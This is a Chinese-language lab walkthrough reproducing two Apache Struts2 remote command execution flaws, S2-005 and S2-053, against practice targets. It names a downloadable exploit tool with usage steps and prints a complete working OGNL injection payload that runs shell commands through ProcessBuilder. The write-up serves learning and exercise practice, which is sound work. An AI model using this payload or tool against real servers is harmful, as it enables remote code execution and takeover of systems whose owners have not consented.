一.Struts2 远程命令执行(S2-005)
- 简介:
- struts2漏洞的起源源于S2-003
- S2-003对#号进行过滤,但是没有考虑到unicode编码情况,导致\u0023或者8进制\43绕过
- S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的
- 范围:
- 受影响版本: 低于Struts 2.0.12
- 漏洞复现:
- 安鸾渗透:http://www.whalwl.site:8088/login.jsp
- 了解到该漏洞就可以使用相关工具进行攻击,这边我推荐的是K8_Struts2_EXP,可以在k8网页上下载,网页下载地址:https://github.com/k8gege/K8tools/blob/master/K8_Struts2_EXP%20S2-045%20%26%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%2020170310.rar
- 打开工具,并准备好相关后台网页
- 随意输出账号密码,然后登录,获取url链接
- 会发现提示用户名不存在,此时获取我们需要的url链接,并复制到exe文件中
- 此时,我们已经获得root权限,然后就可以执行命令
二.Struts2 远程命令执行(S2-053)
- 简介:
- 2017年9月7日,Apache Struts发布最新的安全公告
- 漏洞编号为CVE-2017-12611
- 当开发人员错误的Freemarker表达式构造方式时,可能会导致远程代码执行攻击
- 范围:
-
Struts 2.0.1 – Sturts 2.3.33 and Struts 2.5 – Struts 2.5.10
-
- 漏洞复现:
- 安鸾渗透:http://www.whalwl.site:8027/hello.action
- 了解到相关信息之后,可以找到相关payload进行利用
- payload:%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
- payload转载于https://blog.csdn.net/qq_29647709/article/details/84955205,老哥的使用步骤已经写出来了,我就不给各位大佬列出来了,各位大佬可以看看
最后祝大家早日把题目做完